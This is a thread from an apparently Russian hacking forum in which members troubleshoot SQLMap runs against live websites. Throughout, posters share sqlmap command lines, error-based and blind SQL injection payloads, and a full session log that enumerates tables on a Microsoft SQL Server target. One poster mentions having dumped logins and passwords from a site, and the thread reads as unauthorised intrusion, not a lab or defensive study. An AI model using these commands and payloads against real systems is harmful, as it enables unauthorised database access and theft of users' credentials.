Вопросы по SQLMap

Discussion in 'Уязвимости' started by randman, 1 Oct 2015.

  1. brown

    brown Member

    Joined:
    16 Oct 2016
    Messages:
    267
    Likes Received:
    12
    Reputations:
    1
    Такая трабла,есть скуля но мап не хочет куртить мотому что не видит ответ от сервера.Как указать строку где нужно смотреть.Знаю что есть команда --string но так и не разобрался как с ней работать
     
  2. Runx

    Runx New Member

    Joined:
    22 Feb 2017
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Добрый день подскажите как исправить данную ситуацию :

    При дампе БД или открытии таблиц , sqlmap выводит по одному символу через 3-5 сек.


    Предлагает использовать --time-sec соглашаюсь.
    Если отказаться, вообще не дампит
     
  3. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    Time based SQL-inj по другому некак
     
  4. Runx

    Runx New Member

    Joined:
    22 Feb 2017
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Это и используется
     
  5. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    Как он дампит по одному символу в секунду так и будет дампить
     
  6. Runx

    Runx New Member

    Joined:
    22 Feb 2017
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    От чего это зависит? Если попробовать заюать другую уязвимость? У меня получалось лить БД (логины, пароли) причем достаточно быстро , но сейчас использую другую скулю и нужна другая таблица ( один и тот же сайт)
     
  7. RWD

    RWD Member

    Joined:
    25 Apr 2013
    Messages:
    157
    Likes Received:
    41
    Reputations:
    2
    в данном случае стоит протестировать скрипт на --level 5 --risk 3, может быть булеан или юнион там есть.
     
  8. brown

    brown Member

    Joined:
    16 Oct 2016
    Messages:
    267
    Likes Received:
    12
    Reputations:
    1
    web application technology: ASP.NET, ASP.NET 2.0.50727
    back-end DBMS: Microsoft SQL Server 2008
    Пускает только в current-db,в соседние не пускает(.Есть два пользователя Админ и юзер я под юзером.У обоих нет пассов(по крайней мере null).Как подключиться под админом,или есть варинаты попасть в бд?
     
  9. brown

    brown Member

    Joined:
    16 Oct 2016
    Messages:
    267
    Likes Received:
    12
    Reputations:
    1
    Code:
    sqlmap resumed the following injection point(s) from stored session:
    ---
    Parameter: #1* ((custom) POST)
      Type: error-based
      Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)
      Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTQ2Mjg4MDUwOA9kFgICCA9kFgQCBA8PFgIeB1Zpc2libGVoZGQCDA8
    WAh8AaGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFBkltYWdlMQ==&productselect=All&keywordsearch=fd' AND 7226
    IN (SELECT (CHAR(113) CHAR(122) CHAR(120) CHAR(113) CHAR(113) (SELECT (CASE WHEN (7226=7226) THEN CHAR(49) ELSE CHAR(48
    ) END)) CHAR(113) CHAR(118) CHAR(118) CHAR(113) CHAR(113)))-- mvKE&Image1.x=11&Image1.y=14
      Vector: AND [RANDNUM] IN (SELECT ('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
    ---
    [05:28:16] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
    [05:28:16] [INFO] the back-end DBMS is Microsoft SQL Server
    web server operating system: Windows 2008 R2 or 7
    web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
    back-end DBMS: Microsoft SQL Server 2008
    [05:28:16] [WARNING] missing table parameter, sqlmap will retrieve the number of entries for all database management sys
    tem databases' tables
    [05:28:16] [INFO] fetching tables for database: sfdsffsdf
    [05:28:16] [PAYLOAD] fd' AND 4667 IN (SELECT (CHAR(113)+CHAR(122)+CHAR(120)+CHAR(113)+CHAR(113)+(SELECT ISNULL(CAST(COUN
    T(OPS2013..sysusers.name+CHAR(46)+OPS2013..sysobjects.name) AS NVARCHAR(4000)),CHAR(32)) FROM OPS2013..sysobjects INNER
    JOIN OPS2013..sysusers ON OPS2013..sysobjects.uid BETWEEN OPS2013 AND OPS2013..sysusers.uid WHERE OPS2013..sysobjects.xt
    ype IN (CHAR(117),CHAR(118)))+CHAR(113)+CHAR(118)+CHAR(118)+CHAR(113)+CHAR(113)))-- ZTea
    [05:28:16] [WARNING] reflective value(s) found and filtering out
    [05:28:16] [WARNING] the SQL query provided does not return any output
    [05:28:16] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch
    '--hex'
    [05:28:16] [PAYLOAD] fd' AND 9754 IN (SELECT (CHAR(113)+CHAR(122)+CHAR(120)+CHAR(113)+CHAR(113)+(SELECT ISNULL(CAST(COUN
    T(name) AS NVARCHAR(4000)),CHAR(32)) FROM OPS2013..sysobjects WHERE xtype BETWEEN CHAR AND CHAR(85))+CHAR(113)+CHAR(118)
    +CHAR(118)+CHAR(113)+CHAR(113)))-- jCfI
    [05:28:17] [WARNING] the SQL query provided does not return any output
    [05:28:17] [CRITICAL] unable to retrieve the tables for any database
    Не могу получить таблицы
    parse-error
    Code:
    'System.Web.HttpException: Validation of viewstate MAC failed. If this application is hosted by a Web Farm or cluster, ensure that <machineKey> configuration specifies the same validationKey and validation algorithm. AutoGenerate cannot be used in a cluster'
     
    #369 brown, 11 Mar 2017
    Last edited: 11 Mar 2017
  10. danil911

    danil911 New Member

    Joined:
    28 Mar 2014
    Messages:
    21
    Likes Received:
    1
    Reputations:
    0
    Не получается проэксплуатировать, если перейти по такой ссылке site.ru/filmnews/1, то респонс будет такой :
    HTML:
    <br />
    <b>Warning</b>:  implode() [<a href='function.implode'>function.implode</a>]: Invalid arguments passed in <b>/home/web/site/www/modules/filmnews.php</b> on line <b>42</b><br />
    <br />
    <b>Warning</b>:  mysql_num_rows() expects parameter 1 to be resource, boolean given in <b>/home/web/site/www/modules/filmnews.php</b> on line <b>43</b><br />
    �


    запуск sqlmap.py -u "site.ru/filmnews/1*" не помогает, складывается ощущение, что чего-то не хватает.
     
  11. brown

    brown Member

    Joined:
    16 Oct 2016
    Messages:
    267
    Likes Received:
    12
    Reputations:
    1
    sqlmap.py -u "site.ru/filmnews/1*"
    --level 3 --risk 3 --threads 10 --no-cast
     
  12. nitupme

    nitupme Member

    Joined:
    10 Oct 2015
    Messages:
    20
    Likes Received:
    5
    Reputations:
    0
    всем привет. такой вопрос:
    Существует ли в sqlmap такой синтаксис чтобы sqlmap не требовал подтверждения.
    Т.е не задавал вопрос типа "for the remaining tests, do you want to include all tests for 'MySQL' extending
    provided level (1) and risk (1) values? [Y/n]" а автоматом ставил y или n ???
     
  13. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    --batch Never ask for user input, use the default behaviour
     
  14. PoliGroS

    PoliGroS Member

    Joined:
    29 Mar 2012
    Messages:
    79
    Likes Received:
    8
    Reputations:
    0
    Уязвимость в https://site./x(Elx)%5c-1.html
     
  15. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    Try to increase '--level'/'--risk' values to perform more tests. Написано жи. Пробуй risk=3 level=5
     
  16. brown

    brown Member

    Joined:
    16 Oct 2016
    Messages:
    267
    Likes Received:
    12
    Reputations:
    1
    URL encoded POST input ctl00%24mainbody%24txtZip was set to (select convert(int,CHAR(65)))
    Error message found:
    SqlException
    (select convert(int,CHAR(65))) - это какой темпер?
     
  17. RWD

    RWD Member

    Joined:
    25 Apr 2013
    Messages:
    157
    Likes Received:
    41
    Reputations:
    2
    Вообщем есть скуль, вроде бы не фейлс поситив, инъекция блинд.
    URL encoded GET input uid was set to -1 OR 3*2*1=6 AND 00095=00095

    Tests performed:
    • -1 OR 2+95-95-1=0+0+0+1 => TRUE
    • -1 OR 3+95-95-1=0+0+0+1 => FALSE
    • -1 OR 3*2<(0+5+95-95) => FALSE
    • -1 OR 3*2>(0+5+95-95) => FALSE
    • -1 OR 2+1-1-1=1 AND 00095=00095 => TRUE
    • -1 OR 00095=00095 AND 3+1-1-1=1 => FALSE
    • -1 OR 3*2=5 AND 00095=00095 => FALSE
    • -1 OR 3*2=6 AND 00095=00095 => TRUE
    • -1 OR 3*2*0=6 AND 00095=00095 => FALSE
    • -1 OR 3*2*1=6 AND 00095=00095 => TRUE
    но скульмап почему то нивкакую не хочет зацепиться за линк, есть идеи?
    level 5 risk 3 пробовал, не видит.
     
  18. RaWaS

    RaWaS Member

    Joined:
    13 Jan 2010
    Messages:
    15
    Likes Received:
    7
    Reputations:
    -1
    1. Не всегда Акунетикс прав.
    2. Неправильно вставляешь ссылку
    3. невыставлен должный уровень скана --level 5 --risk 3
    4. и еще куча других вариантов. Выложи то что нашел акунетикс.
     
  19. RaWaS

    RaWaS Member

    Joined:
    13 Jan 2010
    Messages:
    15
    Likes Received:
    7
    Reputations:
    -1
    Так задайте вопрос Акунетиксу, причем тут склмап? Либо выкладывайте полную выдачу.
     
  20. brown

    brown Member

    Joined:
    16 Oct 2016
    Messages:
    267
    Likes Received:
    12
    Reputations:
    1
    причем тут полная выдача и кодировка?